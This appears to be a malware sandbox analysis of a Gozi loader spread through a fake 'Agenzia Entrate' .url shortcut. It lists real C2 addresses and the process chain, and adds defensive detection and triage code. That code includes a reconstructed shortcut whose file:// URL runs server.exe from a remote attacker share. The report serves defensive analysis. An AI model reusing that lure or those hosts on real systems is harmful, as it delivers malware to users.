Analysis
- max time kernel: 143s
- max time network: 130s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 09-03-2023 08:42
Static task: static1
Behavioral task: behavioral1
- Sample: Agenzia_Entrate/Agenzia_Entrate.url
- Resource: win7-20230220-en
General
- Target: Agenzia_Entrate/Agenzia_Entrate.url
- Size: 191B
- MD5: c57ce09111a84d1110b24a8505ff5804
- SHA1: 9fd1e2577f10a24c2678803e073d35e41b551eb2
- SHA256: 257413c17f63500a76f9d0216a8dee283021299a61dc0539e6e870fd5d78177b
- SHA512: 71cf1e5d069a75be84cfcaf82479fb037e75055c05e94ad212453769288b1e3b194156fad802619b0850c9e9abb3c045600779de234b8b51505b1a54f46b7c84
Malware Config
Extracted
- family: gozi
- botnet: 7712
- C2:
  checklist.skype.com
  62.173.141.36
  31.41.44.85
  193.233.175.98
  46.8.210.110
  89.116.227.49
- base_path: /drew/
- build: 250255
- exe_type: loader
- extension: .jlk
- server_id: 50
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence check.
  Process: rundll32.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation (by rundll32.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox attaches the generic text "likely ransomware behaviour" to this signature; no IoCs are listed for it here and the extracted config classifies the payload as a Gozi loader, so read that label as the signature's boilerplate rather than as a finding about this sample.
- Suspicious use of WriteProcessMemory (3 IoCs)
  Process: rundll32.exe
  PID 4892 (rundll32.exe) wrote to the memory of PID 4508 (server.exe); the same source/target pair is recorded three times.
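The three signatures above, plus the parent/child relationship in the process tree, are what a detection engineer would want to match on endpoint telemetry. The following is an added example written for this page, not code from the sandbox or the report: it runs a few rules over a constructed set of Sysmon-style records (ProcessCreate, ProcessAccess) and one constructed RegQueryValue record standing in for a sandbox API-monitor event, since Sysmon does not log registry value reads. PIDs, paths and the noise event are taken from or modelled on the report; the rule names and event dictionaries are assumptions of the example.

```python
import re

# Constructed sample telemetry mirroring the report's process tree and
# signatures. Made up for this example; not the sandbox's output.
# ProcessCreate/ProcessAccess follow Sysmon field names. RegQueryValue is an
# assumed API-monitor record: Sysmon has no event for registry value reads,
# so the Geo\Nation lookup is only visible to API hooking or ETW registry tracing.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "pid": 4892, "ppid": 1000,
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL '
                r'C:\Users\Admin\AppData\Local\Temp\Agenzia_Entrate\Agenzia_Entrate.url'},
    {"type": "RegQueryValue", "pid": 4892,
     "key": r"\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation"},
    {"type": "ProcessCreate", "pid": 4508, "ppid": 4892,
     "image": r"\??\UNC\46.8.210.57\Agenzia\server.exe",
     "cmdline": r'"\\46.8.210.57\Agenzia\server.exe"'},
    # Sysmon records the handle open (event 10), not the WriteProcessMemory call
    # itself; PROCESS_ALL_ACCESS (0x1FFFFF) includes PROCESS_VM_WRITE.
    {"type": "ProcessAccess", "source_pid": 4892, "target_pid": 4508,
     "granted_access": 0x1FFFFF},
    # Benign noise that must not fire: a local program started by explorer.
    {"type": "ProcessCreate", "pid": 5000, "ppid": 1000,
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

PROCESS_VM_WRITE = 0x0020  # the access right WriteProcessMemory requires

# Image path on a remote share: \\host\share\file or \??\UNC\host\share\file
UNC_IMAGE = re.compile(r"^(?:\\\\|\\\?\?\\UNC\\)([^\\]+)\\", re.I)
# rundll32 calling ieframe.dll's OpenURL export on a .url file
OPENURL_CMD = re.compile(r'ieframe\.dll"?\s*,\s*OpenURL\b.*\.url\b', re.I)
# the geofence lookup from the "Checks computer location settings" signature
GEO_NATION = re.compile(r"\\Control Panel\\International\\Geo\\Nation$", re.I)


def detect(events):
    """Return (rule, pid, detail) findings for the Gozi .url -> UNC chain."""
    procs = {e["pid"]: e for e in events if e["type"] == "ProcessCreate"}
    findings = []
    for e in events:
        if e["type"] == "ProcessCreate":
            image = e["image"]
            if image.lower().endswith("rundll32.exe") and OPENURL_CMD.search(e["cmdline"]):
                findings.append(("rundll32_ieframe_openurl", e["pid"], e["cmdline"]))
            m = UNC_IMAGE.match(image)
            if m:
                parent = procs.get(e["ppid"], {}).get("image", "?")
                findings.append(("exec_from_remote_share", e["pid"],
                                 f"{image} spawned by {parent} (host {m.group(1)})"))
        elif e["type"] == "RegQueryValue" and GEO_NATION.search(e["key"]):
            findings.append(("geo_nation_lookup", e["pid"], e["key"]))
        elif e["type"] == "ProcessAccess" and e["granted_access"] & PROCESS_VM_WRITE:
            src = procs.get(e["source_pid"], {}).get("image", "?")
            dst = procs.get(e["target_pid"], {}).get("image", "?")
            # rundll32 obtaining write access to a child that runs from a share
            if src.lower().endswith("rundll32.exe") and UNC_IMAGE.match(dst):
                findings.append(("rundll32_writes_remote_share_child",
                                 e["source_pid"], f"{src} -> {dst}"))
    return findings


def rule_names(events):
    """Distinct rules that fired, sorted, for quick comparison."""
    return sorted({f[0] for f in detect(events)})


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:36} pid={pid} {detail}")
```

The UNC rule alone is the cheapest high-signal check: in most estates no legitimate process image lives on `\\<public IP>\share`, and the child here is spawned by the system's .url handler rather than by an installer or logon script.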
Processes
1. C:\Windows\System32\rundll32.exe (PID 4892)
   Command line: "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Agenzia_Entrate\Agenzia_Entrate.url
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   2. \??\UNC\46.8.210.57\Agenzia\server.exe (PID 4508, child of 4892)
      Command line: "\\46.8.210.57\Agenzia\server.exe"

rundll32.exe ieframe.dll,OpenURL is the handler Windows registers for Internet Shortcut (.url) files, so the first process is simply the .url being opened; the shortcut resolves to a file on a remote share, and server.exe is executed straight from that UNC path. Note that the share host 46.8.210.57 does not appear in the extracted C2 list, which contains 46.8.210.110 in the same 46.8.210.0/24 range.
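Since the 191-byte sample is a .url file whose text the report does not reproduce, the shortcut below is constructed to match the process tree (a file:// URL to Agenzia\server.exe on 46.8.210.57) and is not the real sample. The parser and triage function are an added example for this page, not code from the report or the sandbox: they read the INI-style InternetShortcut format, decide whether the target is off-host (file:// with a host, file://// with a host, or a bare UNC path), and report whether the host is a public IP literal and whether the target has an executable extension. The field names in the returned dictionary and the extension list are assumptions of the example.

```python
import configparser
import ipaddress
from urllib.parse import unquote, urlparse

# Constructed shortcut text shaped to match the report's process tree. This is
# NOT the content of the 191-byte sample, which the report does not show.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://46.8.210.57/Agenzia/server.exe
IconFile=C:\\Windows\\System32\\SHELL32.dll
IconIndex=1
"""

# Extensions that Windows will execute or hand to a script/installer host.
EXEC_EXT = (".exe", ".dll", ".scr", ".msi", ".bat", ".cmd", ".js", ".vbs", ".hta", ".lnk")


def parse_url_file(text):
    """Return the URL= value of an InternetShortcut (.url) file, or '' if absent."""
    # .url files are INI; interpolation=None keeps '%' in URLs intact,
    # strict=False tolerates duplicated keys seen in hand-crafted files.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return ""
    return cp.get("InternetShortcut", "URL", fallback="").strip()


def remote_target(url):
    """If opening the URL fetches a file from another host, return (host, path)."""
    if url.startswith("\\\\"):                       # bare UNC: \\host\share\file
        host, _, rest = url[2:].partition("\\")
        return host, "\\" + rest
    p = urlparse(url)
    if p.scheme.lower() != "file":
        return None                                   # http(s) etc. open in a browser
    host, path = p.netloc, unquote(p.path)
    if not host and path.startswith("//"):            # file:////host/share/file
        host, _, rest = path[2:].partition("/")
        path = "/" + rest
    if not host:
        return None                                   # local file
    return host, path.replace("/", "\\")


def triage(text):
    """Classify a .url file: off-host or not, which host, what kind of file."""
    url = parse_url_file(text)
    target = remote_target(url)
    if target is None:
        return {"url": url, "remote": False}
    host, path = target
    try:
        public_ip = ipaddress.ip_address(host).is_global
    except ValueError:
        public_ip = None                              # hostname rather than an IP literal
    return {"url": url, "remote": True, "host": host, "path": path,
            "public_ip": public_ip,
            "executable": path.lower().endswith(EXEC_EXT)}


if __name__ == "__main__":
    print(triage(SAMPLE_URL_FILE))
```

A shortcut whose target is remote, on a public IP literal, and an executable is exactly the shape of this sample; a mail gateway or EDR rule can refuse or quarantine on that triple without needing the payload, which never touches disk locally because it runs from the share.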